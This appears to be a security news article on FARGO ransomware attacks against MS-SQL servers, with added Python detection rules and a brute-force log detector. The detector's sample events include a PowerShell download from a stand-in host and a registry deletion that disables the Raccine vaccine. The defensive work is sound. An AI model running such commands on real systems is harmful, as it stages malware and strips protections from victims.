Security researchers are warning that FARGO ransomware is being used in a new wave of attacks against vulnerable Microsoft SQL (MS-SQL) servers. MS-SQL servers are database management systems that hold the data behind internet services and business applications, so disrupting them can cause serious problems for an organization.
Cobalt Strike beacons were dropped in similar attacks in February, and in July threat actors hijacked poorly secured MS-SQL servers to steal bandwidth for proxy services. The latest wave is more destructive: its goal is to extort database owners for a quick and easy profit.
According to researchers at AhnLab Security Emergency Response Center (ASEC), FARGO is one of the most prominent ransomware strains targeting MS-SQL servers, alongside GlobeImposter. The same malware family was previously known as “Mallox”, after the “.mallox” extension it once appended to encrypted files, and it is the strain that Avast researchers called “TargetCompany” in a February report, which noted that files encrypted by it can in some cases be recovered for free.
Statistics from the ID Ransomware service indicate that the FARGO family of file-encrypting malware is highly active. The researchers note that the infection begins with the MS-SQL process on the compromised host using cmd.exe and powershell.exe to download a .NET file. That payload then writes and runs a BAT file that terminates specific processes and services and downloads further malware, including the locker itself.
The ransomware payload is then injected into the legitimate Windows process AppLaunch.exe and attempts to delete the registry entry for Raccine, an open-source ransomware “vaccine”. The malware also runs a recovery-deactivation command and kills database-related processes so that database files are no longer locked and can be encrypted. To avoid rendering the infected system unusable, FARGO excludes specific programs and folders from encryption.
Among the exclusions are the Windows system folders, the boot files, Tor Browser, Internet Explorer, user customizations and settings, the debug log file and the thumbnail database. After encryption, the malware drops a ransom note named “RECOVERY FILES.txt” and renames the locked files with the “.Fargo3” extension. Victims who do not pay are threatened with having their stolen files published on the threat actor’s Telegram channel.
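As an added example (not code from the article or from the ASEC report), the following Python sketch turns the infection chain described above into detection rules run over constructed Sysmon-style events: the SQL Server service process spawning a shell, AppLaunch.exe started by an unexpected parent, a registry deletion aimed at Raccine, and the “.Fargo3” extension and “RECOVERY FILES.txt” note appearing on disk. The event field names follow Sysmon Event ID 1 and 11; the allowlist of legitimate AppLaunch.exe parents and the assumption that the Raccine entry lives under Image File Execution Options are mine, not the report’s.

```python
"""Detection rules for the FARGO/Mallox infection chain.

Added example, not code from the article or the ASEC report. Events are
dicts shaped like Sysmon Event ID 1 (process creation) and 11 (file
creation); all sample data below is constructed.
"""
import re
from typing import Dict, Iterable, List

# Which parents legitimately start AppLaunch.exe depends on the environment;
# this allowlist is an assumption for the example, not a tuned baseline.
APPLAUNCH_OK_PARENTS = {"explorer.exe", "services.exe", "svchost.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}
# Raccine registers itself as the IFEO debugger for vssadmin.exe and similar
# tools, so deleting those keys disables it (assumption about which key the
# "delete the Raccine registry entry" step in the report touches).
REG_DELETE_RE = re.compile(r"\breg(?:\.exe)?\b.*\bdelete\b")
IOC_EXTENSION = ".fargo3"
IOC_NOTE = "recovery files.txt"


def basename(path: str) -> str:
    """Lower-cased final path component, so rules ignore install location."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: Dict[str, object]) -> List[str]:
    image = basename(str(ev.get("Image", "")))
    parent = basename(str(ev.get("ParentImage", "")))
    cmd = str(ev.get("CommandLine", "")).lower()
    hits: List[str] = []
    # Rule 1: the SQL Server service process has no business spawning a shell.
    if parent == "sqlservr.exe" and image in SCRIPT_HOSTS:
        hits.append(f"sqlservr.exe spawned {image}: {cmd}")
    # Rule 2: AppLaunch.exe started by an unexpected parent (injection host).
    if image == "applaunch.exe" and parent not in APPLAUNCH_OK_PARENTS:
        hits.append(f"AppLaunch.exe launched by unexpected parent {parent}")
    # Rule 3: registry deletions naming Raccine or the IFEO keys it relies on.
    if REG_DELETE_RE.search(cmd) and (
        "raccine" in cmd or "image file execution options" in cmd
    ):
        hits.append(f"registry deletion affecting Raccine: {cmd}")
    return hits


def check_file(ev: Dict[str, object]) -> List[str]:
    target = str(ev.get("TargetFilename", ""))
    name = basename(target)
    if name.endswith(IOC_EXTENSION):
        return [f"file renamed with FARGO extension: {target}"]
    if name == IOC_NOTE:
        return [f"ransom note dropped: {target}"]
    return []


def scan(events: Iterable[Dict[str, object]]) -> List[str]:
    """Run each event through the rule set for its Sysmon event type."""
    alerts: List[str] = []
    for ev in events:
        if ev.get("EventID") == 1:
            alerts.extend(check_process(ev))
        elif ev.get("EventID") == 11:
            alerts.extend(check_file(ev))
    return alerts


SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
APPLAUNCH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

# Constructed sample telemetry (example.invalid is a reserved, non-routable name).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": SQLSERVR,
     "CommandLine": "cmd.exe /c powershell -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.exe','C:\\Windows\\Temp\\a.exe')\""},
    {"EventID": 1, "Image": APPLAUNCH, "ParentImage": r"C:\Windows\Temp\a.exe",
     "CommandLine": "AppLaunch.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe" /f'},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},  # benign, must not alert
    {"EventID": 11, "Image": APPLAUNCH, "TargetFilename": r"D:\Backups\orders.bak.Fargo3"},
    {"EventID": 11, "Image": APPLAUNCH, "TargetFilename": r"D:\Backups\RECOVERY FILES.txt"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Rule 1 is the one to deploy first: sqlservr.exe launching cmd.exe or powershell.exe is the earliest observable step of the chain and is rarely legitimate, whereas the file-name indicators only fire once encryption has already begun.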
Database servers are frequently compromised through brute-force and dictionary attacks against accounts protected by weak credentials; alternatively, attackers exploit known vulnerabilities that the target has not patched. MS-SQL administrators should therefore use strong, unique passwords and keep the server up to date with the latest security updates.
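As an added example (not code from the article), the following Python script detects the brute-force and dictionary attacks mentioned above by counting failed-login lines per client address in the SQL Server error log. The line format is SQL Server’s own (error 18456 is logged as “Login failed for user '…'” followed by the client address); the sample lines, the threshold and the time window are constructed assumptions to tune per environment.

```python
"""Brute-force detection over SQL Server error-log lines.

Added example, not from the article or the ASEC report. SQL Server logs each
failed login (error 18456) as a "Login failed for user '...'" line ending
with the client address; the sample lines below are constructed in that
format, and the threshold and window are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Optional, Set, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)
THRESHOLD = 10                  # failures from one client ...
WINDOW = timedelta(seconds=60)  # ... inside this window trip an alert


def parse(line: str) -> Optional[Tuple[datetime, str, str]]:
    """Return (timestamp, user, client) for a failed-login line, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
    return ts, m["user"], m["client"]


def detect(lines: Iterable[str], threshold: int = THRESHOLD,
           window: timedelta = WINDOW) -> List[Dict[str, object]]:
    """One alert per client address that reaches `threshold` failures in `window`."""
    recent: Dict[str, Deque[datetime]] = defaultdict(deque)
    total: Dict[str, int] = defaultdict(int)
    accounts: Dict[str, Set[str]] = defaultdict(set)
    alerts: Dict[str, Dict[str, object]] = {}
    for line in lines:
        rec = parse(line)
        if rec is None:            # e.g. the companion "Error: 18456, ..." line
            continue
        ts, user, client = rec
        q = recent[client]
        q.append(ts)
        total[client] += 1
        accounts[client].add(user)
        while ts - q[0] > window:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and client not in alerts:
            alerts[client] = {"client": client, "first_seen": q[0]}
    for client, alert in alerts.items():
        alert["failures"] = total[client]
        alert["accounts"] = sorted(accounts[client])
        alert["pattern"] = ("repeated failures against a single account"
                            if len(accounts[client]) == 1
                            else "failures spread across multiple accounts")
    return list(alerts.values())


def _fail(sec: int, user: str, client: str) -> List[str]:
    """Two constructed log lines in SQL Server's error-log layout."""
    stamp = f"2022-09-20 10:15:{sec:02d}.12"
    return [
        f"{stamp} Logon       Error: 18456, Severity: 14, State: 8.",
        f"{stamp} Logon       Login failed for user '{user}'. Reason: Password did not "
        f"match that for the login provided. [CLIENT: {client}]",
    ]


# Constructed sample: twelve failures for 'sa' from one address in twelve
# seconds, plus one mistyped password from an unrelated client.
SAMPLE_LOG: List[str] = []
for _i in range(12):
    SAMPLE_LOG += _fail(30 + _i, "sa", "203.0.113.5")
SAMPLE_LOG += _fail(45, "appuser", "198.51.100.7")

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("ALERT:", alert)
```

Run it against the live error log (or the same lines forwarded to a SIEM) and block or rate-limit the offending address; this complements the password and patching advice above rather than replacing it, since a single correct guess still succeeds against a weak sa password.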